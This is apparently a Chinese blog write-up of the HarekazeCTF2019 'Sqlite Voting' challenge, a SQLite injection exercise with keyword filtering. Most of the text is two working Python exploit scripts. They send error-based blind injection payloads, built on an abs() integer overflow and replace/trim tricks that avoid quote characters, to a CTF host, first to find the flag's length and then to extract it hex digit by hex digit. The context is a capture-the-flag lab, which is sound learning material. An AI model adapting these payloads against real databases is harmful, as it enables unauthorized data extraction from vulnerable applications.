2. 科技
    3. [HarekazeCTF2019]Sqlite Voting 记录

    [HarekazeCTF2019]Sqlite Voting 记录

    科技2024-10-27  19

    分析源代码,这边过滤了很多sql关键字 这是sqllite 的数据库,mysql的绕过也不可知,由于他过滤了" '所以无法判断是字符型还是整形, 题目前面还给了一段sql语句 可知flag在flag表里 看到这里很明显就要根据这个update来进行盲注 这边我的思路是用mid来代替substr(),我尝试采用异或,括号代替空格 无果,查了查了sqllite,好像没有^这个逻辑运算符,看wp了,对sqllite不熟 wp参考 发现sqllite abs可以弄个整数溢出 如果 abs 的参数是 -9223372036854775808 或者是正数,都会报错 具体结果看上面wp吧

    (下面这段可看可不看了)

    wp里用到了hex()的位运算来判断flag表里的长度,又是一个小细节,根据wp的payload 我判断应该是整形注入,可惜对sqllite不熟 我就稍微改了改wp的脚本,

    import requests url = "http://9bc57f7c-3543-4dac-9a39-b0d6fe93990f.node3.buuoj.cn/vote.php" l = 0 for n in range(16): payload = 'abs(case(length(hex((select(flag)from(flag))))&{})when(0)then(0)else(0x8000000000000000)end)'.format(1<<n) data = { 'id' : payload } r = requests.post(url=url, data=data) print(data) print(r.text) if 'occurred' in r.text: l = l|1<<n print(l)

    判断flag的长度

    用replace来判断,如果payload不在flag里,那么flag长度必为84,学废了根据case when 函数,来进行判断

    import binascii import requests import time URL = 'http://9bc57f7c-3543-4dac-9a39-b0d6fe93990f.node3.buuoj.cn/vote.php' l = 84 header={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'} table = {} table['A'] = 'trim(hex((select(name)from(vote)where(case(id)when(3)then(1)end))),12567)' table['C'] = 'trim(hex(typeof(.1)),12567)' table['D'] = 'trim(hex(0xffffffffffffffff),123)' table['E'] = 'trim(hex(0.1),1230)' table['F'] = 'trim(hex((select(name)from(vote)where(case(id)when(1)then(1)end))),467)' table['B'] = f'trim(hex((select(name)from(vote)where(case(id)when(4)then(1)end))),16||{table["C"]}||{table["F"]})' res = binascii.hexlify(b'flag{').decode().upper() for i in range(len(res), l): for x in '0123456789ABCDEF': t = '||'.join(c if c in '0123456789' else table[c] for c in res + x) r = requests.post(URL, data={ 'id': f'abs(case(replace(length(replace(hex((select(flag)from(flag))),{t},trim(0,0))),{l},trim(0,0)))when(trim(0,0))then(0)else(0x8000000000000000)end)' },headers=header) if 'An error occurred' in r.text: res += x break time.sleep(0.06) # print(f'[+] flag ({i}/{l}): {res}') print('flag(hex): ',res) i += 1 # print('[+] flag:', binascii.unhexlify(res).decode()) print(binascii.unhexlify(res).decode())
    Processed: 0.009, SQL: 8